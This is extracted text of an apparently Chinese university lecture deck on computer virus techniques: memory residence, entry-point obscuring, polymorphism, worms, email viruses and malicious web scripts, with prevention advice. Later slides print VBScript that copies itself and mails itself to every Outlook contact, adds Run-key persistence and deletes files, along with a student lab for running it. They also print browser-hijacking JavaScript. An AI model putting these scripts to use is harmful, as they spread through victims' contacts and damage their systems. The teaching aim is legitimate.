第四章 计算机病毒技术特征.ppt

计算机病毒技术特征 一 常见计算机病毒的技术特征 驻留内存病毒变种EPO EntryPointObscuring 技术抗分析技术 加密 反跟踪 隐蔽性病毒技术多态性病毒技术插入型病毒技术超级病毒技术 破坏性感染技术病毒自动生产技术网络病毒技术 1驻留内存 DOSTSR DOS病毒驻留内存位置示意图 1驻留内存 引导区病毒的内存驻留 大小在1K或者几K为了避免用户可以很容易的觉察到系统可用内存的减少 一些病毒会等待DOS完全启动成功 然后使用DOS自己的功能分配内存 不用考虑重载 1驻留内存 Windows环境下病毒的内存驻留 三种驻留内存的方法由于Windows操作系统本身就是多任务的 所以最简单的内存驻留方法是将病毒作为一个应用程序 病毒拥有自己的窗口 可能是隐藏的 拥有自己的消息处理函数 另外一种方法是使用DPMI申请一块系统内存 然后将病毒代码放到这块内存中 第三种方法是将病毒作为一个VXD Win3 x或者Win9x环境下的设备驱动程序 或者在WinNT Win2000下的设备驱动程序WDM加载到内存中运行 防止重载的方法传统的防止重入方法禁止启动两个实例对于VXD病毒静态加载时 病毒会在 SYSTEM INI 文件中包含加载设备驱动程序的一行信息 动态加载时 可能使用某些英特尔CPU的一些特殊状态位来表示病毒是否存在于内存中 CIH病毒就采用了这种方法 1驻留内存 宏病毒的内存驻留方法 病毒随着宿主程序而被加载并且一直存在于系统中 所以从某种意义上 宏病毒都是内存驻留病毒 宏病毒通过检测自己的特征防止重入 2病毒变种 变形变种 新品种两种方式 手工变种自动变种 MutationEngine 变形机 保加利亚的DarkAvenger的变形机最著名 分类 第一类 具备普通病毒所具有的基本特性 然而 病毒每感染一个目标后 其自身代码与前一被感染目标中的病毒代码几乎没有三个连续的字节是相同的 但这些代码及其相对空间的排列位置是不变动的 这里称其为一维变形病毒 第二类 除了具备一维变形病毒的特性外 并且那些变化的代码相互间的排列距离 相对空间位置 也是变化的 有的感染文件的字节数不定 这里称其为二维变形病毒 第三类 具备二维变形病毒的特性 并且能分裂后分别潜藏在几处 随便某一处的子病毒被激发后都能自我恢复成一个完整的病毒 病毒在附着体上的空间位置是变化的 即潜藏的位置不定 例如 在某台机器中 病毒的一部分可能藏在机器硬盘的主引导区中 另外几部分也可能潜藏在可执行文件中 也可能潜藏在覆盖文件中 也可能潜藏在系统引导区 也可能另开垦一块区域潜藏等等 在另一台被感染的机器内 病毒可能又改变了其潜藏的位置 这里称其为三维变形病毒 第四类 具备三维变形病毒的特性 并且 这些特性随时间动态变化 例如 在染毒的机器中 刚开机时病毒在内存里变化为一个样子 一段时间后又变成了另一个样子 再次开机后病毒在内存里又是一个不同的样子 这里称其为四维变形病毒 3EPO EntryPointObscuring 技术 为什么要采用EPO技术呢 杀毒技术提高 防止被发现 EPO三种实现方法 最早的EPO通过改变程序入口处的代码实现的 简单但无用把宿主程序的任意位置的指令替换为跳转语句 难点在于定位一个完整的指令 类似于一个反编译器 PATCHIAT的函数 如果在一段代码中有一条指令 228738fdff15eb0f107dcall 7d100febh 把它替换成新的指令Call Addressofvirus 在病毒体内还要再次调用Call 7d100febh 来完成宿主程序的功能 代码如下 dwff15h ff15eb0f107d的前缀backaddrdd0 存放ff15eb0f107d的后缀 这个后缀是变化的在病毒代码中 把backaddr的值动态的改为Call 7d100febh 指令编译后的后缀 4抗分析技术 加密技术 这是一种防止静态分析的技术 使得分析者无法在不执行病毒的情况下 阅读加密过的病毒程序 反跟踪技术 使得分析者无法动态跟踪病毒程序的运行 Win95 Flagger病毒 4抗分析技术 自加密技术 数据加密 信息加密 例如 6 4计算机病毒就是这样处理的 计算机病毒发作时将在屏幕上显示的字符串被用异或操作的方式加密存储 1575病毒加密数据文件 加密文件名COMMAND COM病毒代码加密ChineseBomb把宿主程序前6个字节加密并转移位置 1701 1704用宿主程序的长度作为密钥加密代码 4抗分析技术 反跟踪技术 DOS下 修改int0 3中断Windows下 封锁键盘输入关闭屏幕显示修改堆栈指令程序运行计时动态地生成指令代码 5隐蔽性病毒技术 引导型隐藏方法一感染时 修改中断服务程序使用时 截获INT13调用 引导型隐藏方法二针对杀毒软件对磁盘直接读写的特点 截获INT21H 然后恢复感染区最后 再进行感染 文件型病毒的隐藏技术 拦截 API INT调用 访问 恢复 再感染 例如 改变文件大小病毒 dir病毒等 宏病毒的隐藏技术 删除相关的菜单项 文件 模板 或者 工具 宏 使用宏病毒自己的FileTemplates和ToolsMacro宏替代系统缺省的宏 6多态性病毒技术 多态病毒就是没有特殊特征码的病毒 这种病毒无法 或极难 用特征码扫描法检测到 方法 使用不固定的密钥或者随机数加密病毒代码运行的过程中改变病毒代码通过一些奇怪的指令序列实现多态性BASIC Shell等解释性语言可以在一行包括很多语句 使用加密技术的多态性 改变可执行代码技术的多态病毒 基本上都使用在宏病毒中 其他病毒少见 宏语言都是以BASIC为基础的 引导型病毒在引导区或者分区表中 包含了一小段代码来加载实际的病毒代码 这段代码在运行的过程中是可以改变的 文件型病毒 厚度 Ply 病毒 TMC 病毒 多态病毒的级别 半多态 病毒拥有一组解密算法 感染的时候从中间随机的选择一种算法进行加密和感染 具有不动点的多态 病毒有一条或者几条语句是不变的 我们把这些不变的语句叫做不动点 其他病毒指令都是可变的 带有填充物的多态 解密代码中包含一些没有实际用途的代码来干扰分析者的视线 算法固定的多态 解密代码所使用的算法是固定的 但是实现这个算法的指令和指令的次序是可变的 算法可变的多态 使用了上述所有的技术 同时解密算法也是可以部分或者全部改变的 完全多态 算法多态 同时病毒体可以随机的分布在感染文件的各个位置 但是在运行的时候能够进行拼装 并且可以正常工作 查杀技术 对于前面3种多态病毒 可以使用病毒特征码或者改进后的病毒特征码对于第4种多态病毒 可以增加多种情况的改进后的特征码至于第5和第6种多态病毒 依靠传统的特征码技术是完全无能为力的 最好的办法是虚拟执行技术 7插入型病毒技术 DOS下较少PE病毒大多数都是插入型病毒例如 CIH 8超级病毒技术 超级病毒技术就是在计算机病毒进行感染 破坏时 使得病毒预防工具无法获得运行机会的病毒技术 技术较难实现 和杀毒技术相比 具有时效性 9破坏性感染技术 破坏性感染病毒是针对计算机病毒消除技术的一项病毒技术 实例 Burge病毒是这类病毒的典型代表 该病毒会使宿主文件头部丢失560字节 Hahaha病毒会使宿主程序丢失13592字节 传播性差 破坏面小在潜伏期长的情况下 其传播性可以有所改观 10病毒自动生产技术 针对病毒分析的技术两种类型 根据简单的操作 自动生成病毒 PE 宏病毒等 用自动生成技术实现变种 MutationEngine 11网络病毒技术 网络病毒是指以网络为平台 对计算机产生安全威胁的所有程序的总和 常见的几种 木马病毒 Trojan 蠕虫病毒 Worm 邮件病毒网页病毒 二 流行病毒的关键技术 蠕虫病毒利用Outlook漏洞编写病毒Webpage中的恶意代码流氓软件 1蠕虫病毒 蠕虫这个名词的由来是在1982年 Shock和Hupp根据 TheShockwaveRider 一书中的概念提出了一种 蠕虫 Worm 程序的思想 蠕虫 Worm 是病毒的一种 它的传播通常不需要所谓的激活 它通过分布式网络来散播特定的信息或错误 进而造成网络服务遭到拒绝并发生死锁 具有病毒共性 如传播性 隐蔽性 破坏性等独有的性质 不利用文件寄生 对网络造成拒绝服务 以及和黑客技术相结合等等 两类 一种是面向企业用户和局域网而言 这种病毒利用系统漏洞 主动进行攻击 可以对整个互联网可造成瘫痪性的后果 以 红色代码 尼姆达 以及最新的 SQL蠕虫王 为代表 另外一种是针对个人用户的 通过网络 主要是电子邮件 恶意网页形式 迅速传播的蠕虫病毒 以爱虫病毒 求职信病毒为代表 和普通病毒的区别 蠕虫病毒的特性 第一 利用漏洞主动进行攻击第二 病毒制作技术新第三 与黑客技术相结合 潜在的威胁和损失更大第四 传染方式多第五 传播速度快第六 清除难度大第七 破坏性强 蠕虫病毒的机理 蠕虫病毒由两部分组成 一个主程序和另一个是引导程序 主程序收集与当前机器联网的其他机器的信息 利用漏洞在远程机上建立引导程序 引导程序把 蠕虫 病毒带入了它所感染的每一台机器中 当前流行的病毒主要采用一些已公开漏洞 脚本 电子邮件等机制进行传播 例如 IRC RPC等漏洞 蠕虫病毒实例 MSN蠕虫病毒1 基本特征 名称 IM Worm Win32 Webcam a原始大小 188 928字节压缩形式 PESpin编写语言 MicrosoftVisualBasic6 0文件名称 LMAO pif LOL scr naked drunk pif等 2 行为分析 1 蠕虫运行后 将释放一个名为CZ EXE文件到C盘根目录 并将它拷贝到 system 目录下 文件名为winhost exe 然后 将文件属性设置为隐藏 只读 系统 同时将该文件创建时间改成同系统文件日期一样 进行欺骗迷惑 同时蠕虫会在C盘跟目录随机生成一个文件 扩展名为PIF或EXE等 该文件用来向MSN好友传播 此外 病毒还会在 system 目录下生成msnus exe 该文件为蠕虫自身拷贝 2 将自身加入到注册表启动项目保证自身在系统重启动后被加载 位置 Software Microsoft Windows CurrentVersion Run键名 win32键值 winhost exe位置 Software Microsoft Windows CurrentVersion RunServices键名 win32键值 winhost exe 3 蠕虫病毒会在C盘根目录生成一个图片文件 名字为sexy jpg 并调用jpg关联程序打开该图片 一般情况下 会用IE打开该图片 打开后效果如下图 4 开启本地TCP10 xx端口 频繁连接目标 10 0 1 128 8080 接受黑客控制 5 查找MSN窗口 如果存在 则向好友列表中发送消息传播自身 3 防范方案 1 手工清除 按照上面的行为分析 终止并删除相关进程文件 修复注册表 2 用户可以避免接收MSN上发来的陌生附件 包括扩展名为EXE或SCR等的附件 来预防该蠕虫 如何防范蠕虫 预防第一工具保护定期扫描你的系统更新你的防病毒软件不要轻易执行附件中的EXE和COM等可执行程序不要轻易打开附件中的文档文件 不要直接运行附件邮件程序设置谨用预览功能卸载ScriptingHost警惕发送出去的邮件 2利用Outlook漏洞编写病毒 电子邮件成为新型病毒的重要载体利用Outlook漏洞传播的病毒 爱虫 ILoveYou 美丽杀 Melissa 宏病毒 库尔尼科娃 主页 HomePage 欢乐时光 HappyTime 邮件病毒分类 附件方式 病毒的主要部分就隐藏在附件中 主页 HomePage 和 爱虫 ILoveYou 病毒 它们的附件是VBS文件 也就是病毒关键部分 邮件本身 病毒并不置身于附件 而是藏身于邮件体之中 欢乐时光 HappyTime 病毒就是藏身于邮件体中 一旦用户将鼠标移至带毒邮件上 还未阅读邮件就已经中毒了 嵌入方式 病毒仅仅把电子邮件作为其传播手段 美丽杀 Melissa 是一种隐蔽性 传播性极大的Word97 2K宏病毒 尽管其核心内容是宏病毒 但在病毒体内有一块代码专门用来传播 当条件符合时 打开用户的电子邮件地址 向前50个地址发送被感染的邮件 电子邮件型病毒的传播原理 自我复制Setfso CreateObject Scripting FileSystemObject fso GetFile WScript ScriptFullName Copy C temp vbs 这么两行代码就可以将自身复制到c盘根目录下temp vbs这个文件 传播 电子邮件病毒是通过电子邮件传播的 Setola CreateObject Outlook Application OnErrorResumeNextForx 1To50SetMail ola CreateItem 0 Mail to ola GetNameSpace MAPI AddressLists 1 AddressEntries x Mail Subject BetreffderE Mail Mail Body TextderE Mail Mail Attachments Add C temp vbs Mail SendNextola Quit 调整脚本语言的超时设置 dimwscr rrsetwscr CreateObject WScript Shell rr wscr RegRead HKEY CURRENT USER Software Microsoft WindowsScriptingHost Settings Timeout if rr 1 thenwscr RegWrite HKEY CURRENT USER Software Microsoft WindowsScriptingHost Settings Timeout 0 REG DWORD endif 修改注册表 使得每次系统启动时自动执行脚本regcreate HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion Run MSKernel32 dirsystem MSKernel32 vbs regcreate HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion RunServices Win32DLL dirwin Win32DLL vbs MSKernel32 vbs和Win32DLL vbs是病毒脚本的一个副本 破坏性语句 打开磁盘格式化窗口Setobj Wscript CreateObject Wscript Shell Obj Run rundll32 exeshell32 dll SHFormatDrive 打开Windows关闭窗口Setobj Wscript CreateObject Wscript Application Obj ShutdownWindows删除当前目录中所有的 exe文件Setobj Wscript CreateObject Wscript Shell Obj Run C 电子邮件型病毒预防 第一 不要轻易打开陌生人来信中的附件文件 第二 对于比较熟悉的朋友们寄来的信件 也要注意其附件 第三 切忌盲目转发 第四 去掉Windows脚本执行功能 禁止VBS文件执行 第五 不要隐藏系统中已知文件类型的扩展名称 第六 将系统的网络连接的安全级别设置至少为 中等 第七 利用工具 邮件型病毒实验 实验目的 掌握邮件型病毒基本原理 实验平台 WindowsXP操作系统Outlook邮件客户端 实验步骤 Outlook设置用户帐号 Outlook地址薄添加联系人 在实验机器上的C 根目录下创建空文件test vbs 关闭反病毒软件的实时防护功能 把实验代码录入到test vbs文件里 运行脚本文件 程序启动Outlook 由于现在的Outlook版本较高 Outlook会提示是否允许操作 请选择允许 发送邮件 注意事项 1 为了不给你的地址薄联系人传送垃圾邮件 你可以先将地址薄中的联系人导出 然后添入实验用邮件地址 实验结束后 再重新导入原来地址薄中的联系人 2 程序运行后 打开实验用邮箱查看实验结果 一般而言 由于现在的邮件服务器都会对邮件进行扫面 所以传送了病毒的邮件不能传送到邮箱 解决办法是 将程序中的一个语句ObjMail Attachments Add c test vbs 删除 或者将附件c test vbs文件内容改为其他内容 Test vbs的内容 codebeginSetobjOA Wscript CreateObject Outlook Application SetobjMapi objOA GetNameSpace MAPI Fori 1toobjMapi AddressLists CountSetobjAddList objMapi AddressLists i Forj 1ToobjAddList AddressEntries CountSetobjMail objOA CreateItem 0 ObjMail Recipients Add objAddList AddressEntries j ObjMail Subject 你好 ObjMail Body 这次给你的附件时我实验题 如果收到附件轻不要下载 不要打开 ObjMail Attachments Add c test vbs ObjMail SentNextNextSetobjMapi NothingSetobjOA Nothing codeend 4Webpage中的恶意代码 WebPage中的恶意代码主要是指某些网站使用的恶意代码 这些代码打着是给用户加深 印象 提供 方便 的旗号做令人厌恶的事情 万花谷 病毒 脚本病毒基本类型 第一 基于JAVAScript的脚本病毒第二 基于VBScript的脚本病毒可以在Office 浏览器 Outlook中运行 危害性较大 第三 基于PHP的脚本病毒第四 脚本语言和木马程序结合的病毒 病毒的工作机理 病毒利用了下面这段JavaScript代码修改了HKLM SOFTWARE Microsoft InternetExplorer Main 和HKCU Software Microsoft InternetExplorer Main 中的WindowTitle这个键的值 同时 病毒还修改了用户的许多IE设置 如消除运行 RUN 按钮 消除关闭按钮 消除注销按钮 隐藏桌面 隐藏盘符 禁止注册表等 以下就是这个病毒的代码 document write 该函数是现在收藏夹里增加一个站点functionAddFavLnk loc DispName SiteURL varShor Shl CreateShortcut loc DispName URL Shor TargetPath SiteURL Shor Save 该函数是病毒的主函数 实现COOKIES检查 注册表修改等functionf try 声明一个ActiveX对象ActiveXinitializationa1 document applets 0 a1 setCLSID F935DC22 1CF0 11D0 ADB9 00C04FD58A0B 创建几个实例a1 createInstance Shl a1 GetObject a1 setCLSID 0D43FE01 F093 11CF 8940 00A0C9054228 a1 createInstance FSO a1 GetObject a1 setCLSID F935DC26 1CF0 11D0 ADB9 00C04FD58A0B a1 createInstance Net a1 GetObject try if documents cookies indexOf Chg 1 设置IE起始页Shl RegWrite HKCU Software Microsoft InternetExplorer Main StartPage varexpdate newDate newDate getTime 1 documents cookies Chg general expires expdate toGMTString path 消除RUN按钮Shl RegWrite HKCU Software Microsoft Windows CurrentVersion Policies Explorer NoRun 01 REG BINARY 消除关闭按钮Shl RegWrite HKCU Software Microsoft Windows CurrentVersion Policies Explorer NoClose 01 REG BINARY 消除注销按钮Shl RegWrite HKCU Software Microsoft Windows CurrentVersion Policies Explorer NoLogOff 01 REG BINARY 隐藏盘符Shl RegWrite HKCU Software Microsoft Windows CurrentVersion Policies Explorer NoDrives 63000000 REG DWORD 禁止注册表Shl RegWrite HKCU Software Microsoft Windows CurrentVersion Policies System DisableRegistryTools 00000001 REG DWORD 禁止运行DOS程序Shl RegWrite HKCU Software Microsoft Windows CurrentVersion Policies WinOldApp Disabled 00000001 REG DWORD 禁止进入DOS模式Shl RegWrite HKCU Software Microsoft Windows CurrentVersion Policies WinOldApp NoRealMode 00000001 REG DWORD 开机提示窗口标题Shl RegWrite HKLM Software Microsoft Windows CurrentVersion Winlogon LegalNoticeCaption 你已经中毒 开机提示窗口信息Shl RegWrite HKLM Software Microsoft Windows CurrentVersion Winlogon LegalNoticeText 你已经中毒 设置IE标题Shl RegWrite HKLM Software Microsoft InternetExplorer Main WindowTitle 你已经中毒 Shl RegWrite HKCU Software Microsoft InternetExplorer Main WindowTitle 你已经中毒 catch e catch e 初始化函数functioninit setTimeout f 1000 开始执行init 网络炸弹 首先声明插入脚本为JavaScript 定义不断打开新窗口的函数openwindows 所带参数表明打开窗口数量functionopenwindows number 循环for i 0 i 脚本结束标志 类 万花筒病毒 声明脚本为VBScript 定义函数runVirus FunctionrunVirus 实验中弹出对话框告知学员病毒进程msgbox 将要修改主页了 执行注册表改写1 把IE主键修改成 YourHomePage Rw HKEY CURRENT USER Software Microsoft InternetExplorer Main StartPage YourHomePage REG SZ msgbox 修改主页完成 查看一下吧 msgbox 将要隐藏A盘盘符 执行注册表改写2 隐藏A盘盘符 RwHKEY CURRENT USER Software Microsoft Windows CurrentVersion Policies Explorer NoDrives 00000001 REG DWORD msgbox A盘盘符消失 msgbox 注册表工具将要被禁用 执行注册表改写3 禁用注册表编辑器Rw HKEY CURRENT USER Software Microsoft Windows CurrentVersion Policies System DisableRegistryTools 00000001 REG DWORD msgbox 注册表工具禁用 EndFunction 注册表写函数SubRw k v t DimROnErrorResumeNext 关键步骤 调用WScript Shell对象来获得修改权利SetR CreateObject WScript Shell 调用WScript Shell的方法来写注册表R RegWritek v tEndSub 注册表读函数FunctionRg v DimROnErrorResumeNext 关